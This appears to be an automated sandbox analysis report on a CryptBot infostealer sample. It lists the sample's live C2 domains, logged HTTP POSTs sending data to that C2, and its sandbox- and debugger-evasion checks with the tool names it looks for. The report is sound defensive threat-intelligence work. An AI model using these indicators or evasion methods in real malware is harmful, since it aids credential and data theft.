Windows Analysis Report
random(3).exe

Overview

General Information

Sample name: random(3).exe
Analysis ID: 1583233
MD5: c2968f40e6c44036e1d3e18bca61c67d
SHA1: c5ece5cbb5181b1fad9eb16890d0929e0ed18b52
SHA256: 90fd34b5d70fb45f79ebf8d13fedc6e78fa059054fe37bb963f1dd40b803fe93
Tags: exelev-tolstoi-comuser-JAMESWT_MHT
Infos:

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • random(3).exe (PID: 7608 cmdline: "C:\Users\user\Desktop\random(3).exe" MD5: C2968F40E6C44036E1D3E18BCA61C67D)
  • cleanup
Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 list": [".1.1home.fiveth5vs.top", "home.fiveth5vs.top", "KvgPhome.fiveth5vs.top"]}
Source: Process Memory Space: random(3).exe PID: 7608
Rule: JoeSecurity_Cryptbot_1
Description: Yara detected Cryptbot
Author: Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    AV Detection

    Source: random(3).exeAvira: detected
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00103Avira URL Cloud: Label: malware
    Source: KvgPhome.fiveth5vs.topAvira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17Avira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0Avira URL Cloud: Label: malware
    Source: .1.1home.fiveth5vs.topAvira URL Cloud: Label: malware
    Source: home.fiveth5vs.topAvira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWlAvira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk173553773735a1Avira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737Avira URL Cloud: Label: malware
    Source: random(3).exe.7608.3.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": [".1.1home.fiveth5vs.top", "home.fiveth5vs.top", "KvgPhome.fiveth5vs.top"]}
    Source: random(3).exeVirustotal: Detection: 50%
    Source: random(3).exeReversingLabs: Detection: 47%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: random(3).exeJoe Sandbox ML: detected
    Source: random(3).exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebp+04h], 424D53FFh3_2_00CBA5B0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [edi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [esi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [edi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [esi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00CBB560
    Source: random(3).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00C5255D
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00C529FF

    Networking

    Source: Malware configuration extractorURLs: .1.1home.fiveth5vs.top
    Source: Malware configuration extractorURLs: home.fiveth5vs.top
    Source: Malware configuration extractorURLs: KvgPhome.fiveth5vs.top
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 559948
    Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
    Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox ViewIP Address: 34.200.57.114 34.200.57.114
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D1A8C0 recvfrom,3_2_00D1A8C0
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: home.fiveth5vs.top
    Source: unknownHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 559948
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:26 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:28 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
    Source: random(3).exe, 00000003.00000003.1423794455.0000000002137000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1443564848.0000000002139000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1423751958.0000000002132000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
    Source: random(3).exe, 00000003.00000003.1423751958.0000000002132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk173553773735a1
    Source: random(3).exe, random(3).exe, 00000003.00000002.1443495653.000000000210E000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1423247601.0000000002144000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1422965909.0000000002143000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1443595359.0000000002145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
    Source: random(3).exe, 00000003.00000002.1443495653.000000000210E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00103
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: random(3).exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
    Source: random(3).exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: random(3).exe, random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707

    System Summary

    Source: random(3).exeStatic PE information: section name:
    Source: random(3).exeStatic PE information: section name: .idata
    Source: random(3).exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C575A0 appears 632 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C95340 appears 45 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C94F40 appears 306 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C94FD0 appears 243 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C5C960 appears 32 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00D344A0 appears 66 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C6CCD0 appears 53 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C573F0 appears 107 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00E07220 appears 91 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C571E0 appears 44 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C6CD40 appears 73 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C950A0 appears 90 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00E2CBC0 appears 95 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C5CAA0 appears 62 times
    Source: random(3).exeStatic PE information: invalid certificate
    Source: random(3).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: random(3).exeStatic PE information: Section: jzrbpplf ZLIB complexity 0.9945949556599774
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00C5255D
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00C529FF
    Source: C:\Users\user\Desktop\random(3).exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: C:\Users\user\Desktop\random(3).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\random(3).exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: random(3).exeVirustotal: Detection: 50%
    Source: random(3).exeReversingLabs: Detection: 47%
    Source: random(3).exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: random(3).exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: apphelp.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: winmm.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: napinsp.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: pnrpnsp.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: wshbth.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: nlaapi.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: mswsock.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: winrnr.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: wldp.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: napinsp.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: pnrpnsp.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: wshbth.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: nlaapi.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: winrnr.dll
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: kernel.appcore.dll
    Source: random(3).exeStatic file information: File size 4487680 > 1048576
    Source: random(3).exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289a00
    Source: random(3).exeStatic PE information: Raw size of jzrbpplf is bigger than: 0x100000 < 0x1ba400

    Data Obfuscation

    Source: C:\Users\user\Desktop\random(3).exeUnpacked PE file: 3.2.random(3).exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jzrbpplf:EW;qryisspl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jzrbpplf:EW;qryisspl:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: random(3).exeStatic PE information: real checksum: 0x44e9da should be: 0x448f9d
    Source: random(3).exeStatic PE information: section name:
    Source: random(3).exeStatic PE information: section name: .idata
    Source: random(3).exeStatic PE information: section name:
    Source: random(3).exeStatic PE information: section name: jzrbpplf
    Source: random(3).exeStatic PE information: section name: qryisspl
    Source: random(3).exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02157A3F push esp; ret 3_3_02157A41
    Source: C:\Users\user\Desktop\random(3).exe Code function: 3_2_00FD41D0 push eax; mov dword ptr [esp], edx 3_2_00FD41D5
    Source: C:\Users\user\Desktop\random(3).exe Code function: 3_2_00CD2340 push eax; mov dword ptr [esp], 00000000h 3_2_00CD2343
    Source: C:\Users\user\Desktop\random(3).exe Code function: 3_2_00D0C7F0 push eax; mov dword ptr [esp], 00000000h 3_2_00D0C743
    Source: C:\Users\user\Desktop\random(3).exe Code function: 3_2_00C90AC0 push eax; mov dword ptr [esp], 00000000h 3_2_00C90AC4
    Source: C:\Users\user\Desktop\random(3).exe Code function: 3_2_00CB1430 push eax; mov dword ptr [esp], 00000000h 3_2_00CB1433
    Source: C:\Users\user\Desktop\random(3).exe Code function: 3_2_00CD39A0 push eax; mov dword ptr [esp], 00000000h 3_2_00CD39A3
    Source: C:\Users\user\Desktop\random(3).exe Code function: 3_2_00CADAD0 push eax; mov dword ptr [esp], edx 3_2_00CADAD1
    Source: random(3).exe Static PE information: section name: jzrbpplf entropy: 7.956572353209662

    Boot Survival

    Source: C:\Users\user\Desktop\random(3).exe Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\random(3).exe Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\random(3).exe Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\random(3).exe Window searched: window name: Regmonclass
    Source: C:\Users\user\Desktop\random(3).exe Window searched: window name: Filemonclass

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\random(3).exe File opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\random(3).exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1521E0F second address: 1521E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522DA1 second address: 1522DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522DA5 second address: 1522DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523F29 second address: 1523F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522F35 second address: 1522F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523F2E second address: 1523F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29FC518E96h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1520EAE second address: 1520ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC4F36A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522F39 second address: 1522F4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F29FC518E98h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523F38 second address: 1523FA9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1F8Ch], edx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F29FC4F3698h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bx, 6B9Eh 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F29FC4F3698h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F29FC4F369Fh 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522F4F second address: 1522FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b mov di, 2121h 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F29FC518E98h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a xor di, 1B61h 0x0000003f mov eax, dword ptr [ebp+122D1175h] 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F29FC518E98h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F29FC518EA8h 0x0000006a push ebx 0x0000006b pop ebx 0x0000006c popad 0x0000006d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522FE8 second address: 1523004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC4F36A7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523004 second address: 1523010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1524F94 second address: 1524FB5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F29FC4F36A4h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152413B second address: 15241BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F29FC518E96h 0x00000009 jnp 00007F29FC518E96h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F29FC518E98h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D28D1h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a or dword ptr [ebp+12459A4Eh], edx 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 je 00007F29FC518E9Ch 0x0000004d mov edi, dword ptr [ebp+122D2303h] 0x00000053 mov eax, dword ptr [ebp+122D168Dh] 0x00000059 jmp 00007F29FC518E9Eh 0x0000005e push FFFFFFFFh 0x00000060 sub ebx, 3E56853Ah 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a jp 00007F29FC518E96h 0x00000070 pop eax 0x00000071 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1524FB5 second address: 1525029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D288Fh], eax 0x0000000d mov bx, ax 0x00000010 push 00000000h 0x00000012 add ebx, dword ptr [ebp+122D30EBh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F29FC4F3698h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov dword ptr [ebp+1244EDF9h], esi 0x0000003a xor edi, 160A5972h 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 jns 00007F29FC4F369Ch 0x00000048 push edi 0x00000049 js 00007F29FC4F3696h 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F29FC4F36A8h 0x00000059 rdtsc
